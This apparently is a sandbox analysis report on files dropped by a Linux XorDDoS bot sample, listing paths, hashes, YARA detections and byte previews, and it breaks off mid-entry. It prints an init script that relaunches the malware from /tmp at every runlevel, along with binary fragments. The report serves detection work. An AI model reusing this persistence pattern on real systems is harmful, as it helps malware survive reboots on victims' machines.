SHA-512:	321AF3DD88DA9C47FD004D733A7FA3FA057F3E0AD8531A8B80785A83AD46382EBAA12C6F0DF4DF38BEAD4884D0363295E716E5DE26319786773D54A98E26C755
Malicious:	true
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: iJl2Sb6qRa.### BEGIN INIT INFO.# Provides:..iJl2Sb6qRa.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.iJl2Sb6qRa.### END INIT INFO.case $1 in.start)../tmp/iJl2Sb6qRa..;;.stop)..;;.*)../tmp/iJl2Sb6qRa..;;.esac.

/lib/libudev.so

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548638
Entropy (8bit):	6.197537018397919
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojo:/fUywKQ7Fb1pNL/p52fjQn36Euo
MD5:	58881CDFFFCED4E9013EE3FFE4FDC941
SHA1:	425C413C1AB4E1891D85334BDD05CA279CEEA127
SHA-256:	8A1FECA84FE6D3D011C183A32C1F48B1EDB6C98F2D411F0E83038659A3E274C0
SHA-512:	F4EF3AF2332236C07D660A8133D8F345FD7362C2F5AC1A394EF09EC351923902C01481C09B27BCA30273B8ECCA896047A7B69466F90E65A0DD455C2BC34D644D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /lib/libudev.so, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /lib/libudev.so, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /lib/libudev.so, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/run/gcc.pid

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.093139062229566
Encrypted:	false
SSDEEP:	3:FLUPAQxTXBSmB:FgPA5e
MD5:	950A657EE9AE33B4E92C9B673E17EC48
SHA1:	58F85CD5038A63A7E3F8E8E8B15C05194329B216
SHA-256:	109714B1E9C0CC32DDF637CF88EAAA7468EB60C0BB21EAFD0E122D1D4CFB900A
SHA-512:	4414ADF477279CE75CD2BBE89612CF70A1C543E97FEED2922AF6F67DA37E62F1492CDB4E493526181982ED56E48159C1739D80976D15A5B76E2EB2DF96AAA1FF
Malicious:	false
Preview:	wxonqlgszefidbvrcsmgiiobjjsjodcn

/usr/bin/chdmwyeiia

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197600610549569
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojA:/fUywKQ7Fb1pNL/p52fjQn36EuA
MD5:	C71C4DEEF5F37DFDBF1CA7D11B856B4E
SHA1:	811AB14EBFC7A6B2B8F5E49F08802FA54BE71D15
SHA-256:	6451A4536BD956C5C26FD0335DE16FE83FF0EAD08A1075EBA882246B42991060
SHA-512:	3DA4D2FA0F765707658E5DDEC693715C20D4814714B9A12184D8BA76CE18738AED87F50F791BF7CC3FFE57F6E4FA86E2F6DF34697B5A21F439339BE531B7BCAC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/chdmwyeiia, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/chdmwyeiia, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/chdmwyeiia, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/chdmwyeiia, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/cjfywultqo

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.1975770166096025
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojj:/fUywKQ7Fb1pNL/p52fjQn36Euj
MD5:	90CAF41492792C802131AF2BAA7A0BD1
SHA1:	3AF2974FD5FA09CAA13BE7BE0A22FC57A5805445
SHA-256:	730AD28B7400408D7DA579973876B32CEE4D19B163E3BF374EE6DF46CA50D0EF
SHA-512:	68F91FB28AA1E8F7DE5041860253CA965F4A15539A6E1C55764072DE36AE7025159C5026573696FCB4DCBEABDFD88FA9F78C88FBDFEA0050ED7E4333645F4F4F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cjfywultqo, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cjfywultqo, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/cjfywultqo, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/cjfywultqo, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/ckxgqrmzxa

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.1975897440170415
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojv:/fUywKQ7Fb1pNL/p52fjQn36Euv
MD5:	9CA1940212FEE4AA01A0D75859BE67AD
SHA1:	A75E13B37DD17228C3550086E22653C1F05EE800
SHA-256:	B4C0AFC9E01C25EE9005C7FB7BB8C97CD976793413D9F95B82CD5971DC045D9B
SHA-512:	BE6728DBFABC68CB0AD589775C108907432B4B97F752BA39EEB195C8D110258C1E7908E72C9BD687155228E076CB24A7E53BFE4D9E050A97AAEF999F9379D7DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ckxgqrmzxa, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ckxgqrmzxa, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ckxgqrmzxa, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ckxgqrmzxa, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/dezqblvxuy

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197586606471035
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojR:/fUywKQ7Fb1pNL/p52fjQn36EuR
MD5:	28855A67A8446C5A6D01B3B3BF0B4B52
SHA1:	FDAA77D6A3AAB07693CA37B937F49C952295F8E7
SHA-256:	541BD90859A65C5DD29C78275B6ED4811B53AC68214C9B75C487D889CE81B747
SHA-512:	446285763F404AB64CF2D2E0A244CDB59F80487407043682B13A7FEE38E1778098A2CC9D9996A549681BD5C55096EDEDA8826436F69F1A3F349D35FD644E0EC4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dezqblvxuy, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/dezqblvxuy, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/dezqblvxuy, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/dezqblvxuy, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/emnaztxelb

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers at 548576
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.323259292948688
Encrypted:	false
SSDEEP:	6144:axnm9lfABacn+mKwrXW52+ipNTJVP3nWydo4tdZ9XpCz16MwYPFM5FgjTcxpQyV3:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz3
MD5:	CE32DEB87690503CF1F8B0E1972D06BD
SHA1:	0D4FAF5482F785CE6BC5A32840FFE7EE6209F7D4
SHA-256:	D234EFEB4883204EA27951106629C10EE7177D6B723C8EEA4B866DB09BDF97A2
SHA-512:	DC86F39D21AFF54BB8A6EDACD3C2CDB7E4E318A4753D05AD3B82999A8F8BB93DE80064D34432517EAAAD1EEBEC8ED29632C556F5533B7E309528E0A19E7650FC
Malicious:	true
Yara Hits:	Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/emnaztxelb, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/eoqlmyvucn

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197580352861844
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojy:/fUywKQ7Fb1pNL/p52fjQn36Euy
MD5:	7421C1F0ECE93B4321A3809440512935
SHA1:	74A88F0F873AC61FF39E2C687C1143CC4B56DF73
SHA-256:	F2BFC0A15FEA6F0A28FA520C8210FA8FEF090C9E9F0EF13C0E3BFD5B3D8E46B1
SHA-512:	1B6F1A9C77F27E73728EE2E3DA2CD533E8FF4798399B43AD1AC34E3E5C66E4A57538E0CEC776A04471839CE6767EA8D95C35EA3FB3399D57A1EF3AA41D2C0FA9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eoqlmyvucn, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eoqlmyvucn, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eoqlmyvucn, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eoqlmyvucn, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/hgfzmygnbx

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197605633721598
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoju:/fUywKQ7Fb1pNL/p52fjQn36Euu
MD5:	872880F6F7422435AE6D1EAEFE04A5A4
SHA1:	155452D98E2ECFC92E65FC9B09A87F93B1910DF4
SHA-256:	ECD98C634F61229F9E9C33E840B97612F031C6E14F53DF738D9A4DFC949159DD
SHA-512:	EC3333751D37F2BC05D732FAD10AD812524EF1F9D24BCC034CDFD46DC94C5C7DC539E701C628DDB84F486E670E1876093035E505C58FC22F4C3A6BE3F86B2644
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hgfzmygnbx, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hgfzmygnbx, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/hgfzmygnbx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/hgfzmygnbx, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/hiueshutol

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.1975992591476805
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojb:/fUywKQ7Fb1pNL/p52fjQn36Eub
MD5:	5CA107404275778CA2B07A8590D03272
SHA1:	9BC7DD744C8780EA288D71289C8F8A3DA771CB52
SHA-256:	9FB5C934516F7BDA1072042DB6732BB99500AF937B007E424811C95EA48DC235
SHA-512:	B83724CB1A79216AC47A577A57525C95DD2D296304C3F7395370095FEB20A16F39646D2FC3F3BE61B48017F5003919D7CB4E60BBC0064986E21FD646F4F3A87F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hiueshutol, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hiueshutol, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/hiueshutol, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/hiueshutol, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/lnmgbribvb

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197587289551511
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojB:/fUywKQ7Fb1pNL/p52fjQn36EuB
MD5:	A2EDA8F3694EF7EB8B04888E5ED38A24
SHA1:	9B174D2C1B4840C39A60B72A717FAA80BFEE5A6E
SHA-256:	AFFD4929AEB05C1686FEA6A00456FC8365393B99D2671FAAC07BDFFD1EB860A8
SHA-512:	1716D1DC3AF47788FF26C7FFBD1E2E0E2E3742B350F52A8CDC5A328BDC59720AA57F1CD3B93DDA23C547B5C3EA14E745ACD5EF50866610C3A4372F644DF995C2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lnmgbribvb, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/lnmgbribvb, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/lnmgbribvb, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/lnmgbribvb, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/lsodknzpps

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197586254269363
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojp:/fUywKQ7Fb1pNL/p52fjQn36Eup
MD5:	A48EF1E0784BBCADF9025524CDF26387
SHA1:	A178E12270E5B2205407FB06D8EF8F957F746DDB
SHA-256:	969855A1B5138348ED28893E9E369DFF20B7DD3C522DA56397B448233A973D97
SHA-512:	EBC4AE8B72C13BA9EFC3A043D4EE41E2B284AD05D7787E94D54FF993BA5F77D6BC93F642302C1DC48F117B0DD93212E4BDB6CD0C3AFE098A94972938CC38B5C6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lsodknzpps, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/lsodknzpps, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/lsodknzpps, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/lsodknzpps, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/mhvrcmaysv

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.19759150361793
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojo:/fUywKQ7Fb1pNL/p52fjQn36Euo
MD5:	9B1DA24294CED34670C702E0FDEFA42B
SHA1:	6F921CC33772BB1AA7F33CC0265412FDCFE3888D
SHA-256:	1218948B2DB76CC5A0E4C12BD3B81C91ADCFA6658774D4A937A6571EEBAABE30
SHA-512:	B277205E3C2EA569CF66DDE9BE8617372C08FA76AB8CAD8B1300B98909DAC0DA13CE65E19F355C428DD6D636A621DF4ACACDE54E3A74A7605BFEF27839621EEC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mhvrcmaysv, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mhvrcmaysv, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mhvrcmaysv, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mhvrcmaysv, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/wdcujvrbpo

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197574373545366
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojx:/fUywKQ7Fb1pNL/p52fjQn36Eux
MD5:	635DA966C3034A8039505F87E4BD322D
SHA1:	568D314D6AD806328A99D5455682411ECC89CABB
SHA-256:	BBD60D699610703E5B6AC677886F0BCC9FC30418873461F8CD62536614F6B4D2
SHA-512:	6EE1ED3E5FAB17A3B0B5E69603B8D348C21AD19EE265D9C6F8CA199880A86C8655EDBCD7557DD6FD6BF3CBC46EBAA9CEF366E62A34C960A332F8B05861834A27
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wdcujvrbpo, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wdcujvrbpo, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wdcujvrbpo, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wdcujvrbpo, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/wzhmvohlxs

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197592280615578
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojV:/fUywKQ7Fb1pNL/p52fjQn36EuV
MD5:	8816CEE3C946563644FF93E94D5FFA35
SHA1:	BB7520DC5D1663E04418BB3F0A241F1066D11168
